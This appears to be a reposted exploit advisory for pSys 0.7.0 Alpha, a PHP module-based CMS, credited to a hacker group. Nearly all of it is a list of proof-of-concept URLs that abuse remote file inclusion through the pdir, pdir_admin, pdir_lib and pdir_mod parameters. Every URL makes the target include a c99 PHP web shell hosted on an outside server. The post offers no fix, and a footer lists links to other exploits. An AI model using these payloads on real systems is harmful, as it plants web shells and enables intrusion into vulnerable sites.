pSys 0.7.0 Alpha Multiple Remote File Inclusion Vulnerability

所属分类：网络安全 / Exploit 阅读数： 203

收藏 0赞 0分享

====================================================
| pSys v0.7.0 Alpha Multiple Remote File Include
| (works only with register_globals = on)
| Founded By rXh RoMaNTiC-TeaM
====================================================

[!] Discovered.: RoMaNcYxHaCkEr
[!] Vendor.....: http://www.powie.de
[!] My Homepage...: WwW.4RxH.CoM
[!] RoMaNTiC-TeaM Members ...: Unknown Hacker , aLwHeD , GaMe-OvEr-HaCkErs
[!] Contact Me ...: rxh0@hotmail.com

[!] Background.: pSys is a module based PHP Script

[!] Bugs........: In Different Files & In Different Variable And Lines

[!] PoC........:

http://4RxH.CoM/cms1/login.inc.php?pdir=http://www.uploadhere.org/c99.txt?
http://4RxH.CoM/cms1/admin/adminmenuright.php?pdir_admin=http://www.uploadhere.org/c99.txt?
http://4RxH.CoM/cms1/admin/fuss.php?pdir_admin=http://www.uploadhere.org/c99.txt?
http://4RxH.CoM/cms1/admin/kopf.php?pdir_admin=http://www.uploadhere.org/c99.txt?
http://4RxH.CoM/cms1/forum/ajax_newpost.inc.php?pdir_lib=http://www.uploadhere.org/c99.txt?
http://4RxH.CoM/cms1/panels/panel_shopkategorie.php?pdir_mod=http://www.uploadhere.org/c99.txt?
http://4RxH.CoM/cms1/panels/panel_shopkunde.php?pdir_mod=http://www.uploadhere.org/c99.txt?
http://4RxH.CoM/cms1/panels/panel_user.php?pdir=http://www.uploadhere.org/c99.txt?
http://4RxH.CoM/cms1/mod/gb/ajax_post.inc.php?pdir_lib=http://www.uploadhere.org/c99.txt?
http://4RxH.CoM/cms1/style/csg/fuss.php?pdir=http://www.uploadhere.org/c99.txt?
http://4RxH.CoM/cms1/style/csg/kopf.php?pdir=http://www.uploadhere.org/c99.txt?
http://4RxH.CoM/cms1/style/default/fuss.php?pdir=http://www.uploadhere.org/c99.txt?
http://4RxH.CoM/cms1/style/default/kopf.php?pdir=http://www.uploadhere.org/c99.txt?
http://4RxH.CoM/cms1/style/simpleblack/fuss.php?pdir=http://www.uploadhere.org/c99.txt?
http://4RxH.CoM/cms1/style/simpleblack/kopf.php?pdir=http://www.uploadhere.org/c99.txt?

[!] Solution...: Contact With Me I Will Declear All This Fucking Function

[!] Greetingz..: No One Deserved (Am I Said The Truth ?!!!)

[!] Thx .. : DNX For Your Exploit I Found This Bugs From Your Exploit :)

[!] rXh

[!] bEST wISHES

更多精彩内容其他人还在看

pSys 0.7.0 Alpha Multiple Remote File Inclusion Vulnerability

Wordpress Plugin Download Manager 0.2 Arbitrary File Upload Exploit

PHP 4.4.5 / 4.4.6 session_decode() Double Free Exploit PoC

FreeBSD mcweject 0.9 (eject) Local Root Buffer Overflow Exploit

Oracle 10g KUPM$MCP.MAIN SQL Injection Exploit

NaviCOPA Web Server 2.01 Remote Buffer Overflow Exploit (meta)

MS Internet Explorer Recordset Double Free Memory Exploit

Easy File Sharing FTP Server 2.0 (PASS) Remote Exploit

Linux Kernel

MS Internet Explorer (FTP Server Response) DoS Exploit

MS Windows DCE-RPC svcctl ChangeServiceConfig2A() Memory Corruption

网络赚钱

站长故事